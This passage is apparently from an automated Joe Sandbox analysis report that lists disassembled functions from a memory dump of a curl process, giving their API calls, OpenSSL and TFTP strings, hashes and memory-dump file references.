                                                                                                                                                                    • Opcode Fuzzy Hash: 9d48ea08cb4d3bf1c2da6e48e5bea191dbaf49720a974952d68796026bae9a3d
                                                                                                                                                                    • Instruction Fuzzy Hash: F5C1A1B18546299ECB309F258C48BBAB7F8EF08311F1046AEF58DD2291E7349D91CF25
                                                                                                                                                                    Function 00236650 Relevance: 23.2, APIs: 1, Strings: 12, Instructions: 455COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    • You need to read the OpenSSL FAQ, http://www.openssl.org/support/faq.html, xrefs: 00236BB4
                                                                                                                                                                    • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 00236BD6
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rand\md_rand.c, xrefs: 00236AF1
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rand\md_rand.c, xrefs: 002366E1
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rand\md_rand.c, xrefs: 00236B70
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rand\md_rand.c, xrefs: 00236BA2
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rand\md_rand.c, xrefs: 00236735
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rand\md_rand.c, xrefs: 00236865
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rand\md_rand.c, xrefs: 002366C5
                                                                                                                                                                    • ...................., xrefs: 002367CF
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\evp\digest.c, xrefs: 00236BE0
                                                                                                                                                                    • gfff, xrefs: 00236690
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ....................$..\..\openssl\openssl\crypto\evp\digest.c$..\..\openssl\openssl\crypto\rand\md_rand.c$..\..\openssl\openssl\crypto\rand\md_rand.c$..\..\openssl\openssl\crypto\rand\md_rand.c$..\..\openssl\openssl\crypto\rand\md_rand.c$..\..\openssl\openssl\crypto\rand\md_rand.c$..\..\openssl\openssl\crypto\rand\md_rand.c$..\..\openssl\openssl\crypto\rand\md_rand.c$You need to read the OpenSSL FAQ, http://www.openssl.org/support/faq.html$ctx->digest->md_size <= EVP_MAX_MD_SIZE$gfff
                                                                                                                                                                    • API String ID: 0-1816848540
                                                                                                                                                                    • Opcode ID: a2d4d63744c4dab8b0789528154095a7be9712fc515bf298060204c3457217bc
                                                                                                                                                                    • Instruction ID: b024990ca839a4a64515c4c3ef73ecb9ec2754bd830d8e13269fc33525e0f64e
                                                                                                                                                                    • Opcode Fuzzy Hash: a2d4d63744c4dab8b0789528154095a7be9712fc515bf298060204c3457217bc
                                                                                                                                                                    • Instruction Fuzzy Hash: ACF13374A183819FD311DF78DC45B5ABBE8AF88740F048A2EF981D7252E7B0D855CB92
                                                                                                                                                                    Function 002361A0 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 372COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rand\md_rand.c, xrefs: 002365E5
                                                                                                                                                                    • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 00236604
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rand\md_rand.c, xrefs: 00236277
                                                                                                                                                                    • gfff, xrefs: 0023630F
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rand\md_rand.c, xrefs: 0023624D
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rand\md_rand.c, xrefs: 0023634C
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rand\md_rand.c, xrefs: 00236572
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rand\md_rand.c, xrefs: 0023620D
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\evp\digest.c, xrefs: 0023660E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ..\..\openssl\openssl\crypto\evp\digest.c$..\..\openssl\openssl\crypto\rand\md_rand.c$..\..\openssl\openssl\crypto\rand\md_rand.c$..\..\openssl\openssl\crypto\rand\md_rand.c$..\..\openssl\openssl\crypto\rand\md_rand.c$..\..\openssl\openssl\crypto\rand\md_rand.c$..\..\openssl\openssl\crypto\rand\md_rand.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE$gfff
                                                                                                                                                                    • API String ID: 0-3750532213
                                                                                                                                                                    • Opcode ID: d5fd819f0776c291a7b669757ea355652b67e57a361f3035bf95cfda1b89614e
                                                                                                                                                                    • Instruction ID: dd23f1418ebed8306e5adca537f9e3d14b80e82c9c47a353a5a7a1be7bebcc25
                                                                                                                                                                    • Opcode Fuzzy Hash: d5fd819f0776c291a7b669757ea355652b67e57a361f3035bf95cfda1b89614e
                                                                                                                                                                    • Instruction Fuzzy Hash: 9BD103B0A14342ABD715CF64DC45B6BB7ECAF84B00F54862DF985DB281EBB0D914CB92
                                                                                                                                                                    Function 001F74D0 Relevance: 17.9, APIs: 2, Strings: 8, Instructions: 364COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: %lld$%s%c%s%c$blksize$netascii$octet$tftp_send_first: internal error$timeout$tsize
                                                                                                                                                                    • API String ID: 0-3145828919
                                                                                                                                                                    • Opcode ID: 3baf24a49cca2038e32fe5288d771b0fbc043135845f7856866a4c95ade8097c
                                                                                                                                                                    • Instruction ID: 734550df098a2931d77683b84e6adb758309aec2aac8b99691f691f276f81fe5
                                                                                                                                                                    • Opcode Fuzzy Hash: 3baf24a49cca2038e32fe5288d771b0fbc043135845f7856866a4c95ade8097c
                                                                                                                                                                    • Instruction Fuzzy Hash: 0DC107763086049FC719DF38DC81AFBB7E2AF89304F44452DE59A87292EB32E9098750
                                                                                                                                                                    Function 0022AC50 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77registrywindowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4), ref: 0022AC66
                                                                                                                                                                    • GetFileType.KERNEL32(00000000), ref: 0022AC71
                                                                                                                                                                    • GetVersion.KERNEL32 ref: 0022ACD9
                                                                                                                                                                    • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 0022ACF7
                                                                                                                                                                    • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 0022AD1B
                                                                                                                                                                    • DeregisterEventSource.ADVAPI32(00000000), ref: 0022AD22
                                                                                                                                                                    • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 0022AD4C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportTypeVersion
                                                                                                                                                                    • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                                                                                    • API String ID: 2339391290-1348657634
                                                                                                                                                                    • Opcode ID: 8273aa37ea91544aaab598ece4b9f31c57c7cb5ac8535c223db23ad2cbd9e4f1
                                                                                                                                                                    • Instruction ID: 0a6f71f61be3d63d3f8219e627b06349b98467bce7a7e482845a1d0acae2d18e
                                                                                                                                                                    • Opcode Fuzzy Hash: 8273aa37ea91544aaab598ece4b9f31c57c7cb5ac8535c223db23ad2cbd9e4f1
                                                                                                                                                                    • Instruction Fuzzy Hash: F221D371A543007BE730AB60EC4BFEF779CAF98701F80481AF699861D0EAB594508B53
                                                                                                                                                                    Function 001D17A0 Relevance: 12.4, APIs: 4, Strings: 4, Instructions: 387COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 001D196A
                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 001D1974
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?), ref: 001D198C
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?), ref: 001D199B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                    • String ID: %02d:%02d$%02d:%02d:%02d$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]$+
                                                                                                                                                                    • API String ID: 1452528299-1722805465
                                                                                                                                                                    • Opcode ID: 783befc4f5d5bcfea25644c6b3c1792c7c0b44a69985f1cc7122a9b960a624e6
                                                                                                                                                                    • Instruction ID: 3180931a586e79eb3e558c7941ec61a5a6cbc57ac1e7fe23585f49f4abff6d73
                                                                                                                                                                    • Opcode Fuzzy Hash: 783befc4f5d5bcfea25644c6b3c1792c7c0b44a69985f1cc7122a9b960a624e6
                                                                                                                                                                    • Instruction Fuzzy Hash: 88D1B171A083417BC724DF28988026EBBE5AFD9360F544B2FF9A5873D1E731D9458B42
                                                                                                                                                                    Function 002D8705 Relevance: 9.2, APIs: 6, Instructions: 160memoryfileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 002C08C3: SetFilePointerEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,002C085C,?,?,?,?,00307930), ref: 002C08FA
                                                                                                                                                                      • Part of subcall function 002C08C3: GetLastError.KERNEL32(?,?,?,?,002C085C,?,?,?,?,00307930,00000018,001C34F9,?,?,?,?), ref: 002C0904
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,001C5539,00000001,00000000,?,?,002CF8BC,001C5539,00000000,00000080), ref: 002D876E
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,001C5539,00000001,00000000,?,?,002CF8BC,001C5539,00000000,00000080), ref: 002D8775
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,001C5539,?,?,?,?,?,?,?,?,001C5539,00000001,00000000,?,?,002CF8BC), ref: 002D8817
                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,001C5539,00000001,00000000,?,?,002CF8BC,001C5539), ref: 002D881E
                                                                                                                                                                    • SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,001C5539,00000001,00000000,?,?,002CF8BC), ref: 002D8854
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,001C5539,00000001,00000000,?,?,002CF8BC,001C5539), ref: 002D8884
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$ErrorFileLastProcess$AllocFreePointer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1354853467-0
                                                                                                                                                                    • Opcode ID: dcb3e544d482d637fd9f7fbb844f18797392b5ee9eacbfc4d77c8be817ae6969
                                                                                                                                                                    • Instruction ID: a05a74cf6f40c58224c09020e81b7bbf2806e60976ae0dcee8bc22e91f26fcb1
                                                                                                                                                                    • Opcode Fuzzy Hash: dcb3e544d482d637fd9f7fbb844f18797392b5ee9eacbfc4d77c8be817ae6969
                                                                                                                                                                    • Instruction Fuzzy Hash: 3B411736D20515ABEB206FB88C4AFADBB74EF04760F24431BF524D73D0EA748C615AA1
                                                                                                                                                                    Function 001D23B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,001DD974), ref: 001D23B7
                                                                                                                                                                    • FormatMessageA.KERNEL32(00001000,00000000,00000000,00000000,?,000000FF,00000000,001DD974), ref: 001D240F
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,001DD974), ref: 001D246B
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,001DD974), ref: 001D2476
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$FormatMessage
                                                                                                                                                                    • String ID: Unknown error %d (%#x)
                                                                                                                                                                    • API String ID: 71157656-2414550090
                                                                                                                                                                    • Opcode ID: ff5736fac91290edca3109a6ba214033d615e45fa9e29c53db221c3873e3b0f8
                                                                                                                                                                    • Instruction ID: d001dca1254a1d9eaac3f6ea1fe2e9a7769d3f807d655e87bbf432dd830e04ab
                                                                                                                                                                    • Opcode Fuzzy Hash: ff5736fac91290edca3109a6ba214033d615e45fa9e29c53db221c3873e3b0f8
                                                                                                                                                                    • Instruction Fuzzy Hash: AE113870B406016AE72526356C4AF7F298D8FB7706F04003EFC2AE6793EFB0881181B2
                                                                                                                                                                    Function 002D6DA3 Relevance: 7.7, APIs: 5, Instructions: 189COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,00000055), ref: 002D6EBC
                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 002D6F10
                                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 002D6F23
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040), ref: 002D6F76
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 002D6F8D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
